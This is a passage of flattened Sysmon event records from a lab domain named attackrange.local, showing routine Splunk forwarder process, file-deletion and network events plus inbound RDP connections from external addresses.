Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977942Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.531{69CF5F33-89D0-6151-A879-00000000FD01}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977941Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.389{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74C62DEF3D1539D2CB3C442DDEF1CF2A,SHA256=EF5AC1A725B3F0276E0CED159B4F8CBAE095B842698138923BBA298DBA68B1AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977940Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.170{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=026CF2744FC2326C7F4E451DE53B587F,SHA256=44503052445C40167CEF07C783289DF165F57815A9F3DE75AA0C864962F858E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977939Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.155{69CF5F33-89CF-6151-A779-00000000FD01}2432820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049298Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:28.984{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F0045660AE243B00F0177EBCC536287C,SHA256=1B35E37652965D884F632EBD974CAABCCDA60530FF57394783F627DD19E5E52C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049297Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:28.347{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A1E65CB39925BCBA9F624DE4E0EFC77,SHA256=D74BF557E5DC79BED06E8EA3BB1ECF5B4B21F02A220EEE0F6D2A844B3601D6F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977970Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.671{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=856D1CCB37E702857B1B40DE0C682E31,SHA256=2C5528E91D06718CFA5C57882414B4C1F89025ADE4748DE87E3D29F14D9BE0FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977969Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.671{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E90FFFC9A14BA4F0063DD0C67A24EA24,SHA256=12D38A32982A6A82387F21A72008B09CB02FE46EAB9FB8ED2B26826ADB65B423,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049300Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:26.936{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50773-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049299Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:29.365{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=769F1AAFB3313D34CA29E0EC84D82AC0,SHA256=1A93F6C8E8E6F7F2C66DEC4193AEDC71EF1AD1B9AE26003B9F4A43871A260CDD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977968Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.374{69CF5F33-89D1-6151-A979-00000000FD01}33803892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977967Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.233{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-89D1-6151-A979-00000000FD01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977966Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.233{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977965Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.233{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977964Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.233{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977963Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.233{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977962Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.233{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977961Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.233{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977960Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.233{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977959Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.233{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977958Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.233{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977957Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.233{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-89D1-6151-A979-00000000FD01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977956Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.217{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-89D1-6151-A979-00000000FD01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977955Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.218{69CF5F33-89D1-6151-A979-00000000FD01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977973Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.950{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-64944-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977972Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:30.717{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88A1393CB1813DE56B97586C7FFA192C,SHA256=1C41BEA0FF6CE5608630912256E669D68A5B040F7DBDBAF0468D321591E26DF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977971Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:30.702{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB98ADE1AD5C1B1D909296EE2CC7B46B,SHA256=9A3DEC83CF1C86E2476C978D42524A8F77DC5234E1B750C0AB0CCC89B86EB044,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049302Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:27.938{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53296-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049301Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:30.402{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F37D5B4F5AB4E9CBDD73F59D1533563,SHA256=A8CF658E6E3AAE65F6BF25D5579BFC4E6703651BE245E146A98F8F06538A83DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977975Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.909{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59330-false10.0.1.12-8000- 23542300x8000000000000000977974Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:31.717{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83A7F40652E4E9DBBC0717CBEF9CC555,SHA256=301D339FD15403407CBF9ED0DD738CAEB1D977BCFC59D74614A0A63AB273CD9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049305Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:31.501{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2242FB8FEEE0BD7F814AD10A69F36D2,SHA256=1620A2AF964B42AD2ACD0C5EA27946996CCE6E72EC7B5DA4F9BC235C2EA176AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049304Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:28.962{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse210.245.92.42-52575-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049303Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:31.186{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8EE3D7CDD0894327B5D659AD772EDF99,SHA256=6B1E38BAC0D25FFF0C1FDAB9FB5822BAADDCF67BB6050FA53C2345347751D2C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977979Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:29.971{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53288-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977978Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:32.733{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0402C1F046300A8A3748CA6664427897,SHA256=D88B81E04B0DD51D325F60DB50DB22C2F4A636FC5F9417A9462872C1BBD70280,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049306Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:32.547{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16CD250AED91FF677714C898E6A36BD6,SHA256=8CDABEA6E745BE2B24BDA772D4EA91652813852D38523847D1BB08CB152BEAC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977977Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:32.717{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=003028C498A5210C6CED6B17FCE29AA9,SHA256=7FA4C9A7FDE8816B851CD260ADAFFBC301F896839E4B698F57192C12415168A2,IMPHASH=00000000000000000000000000000000falsetrue 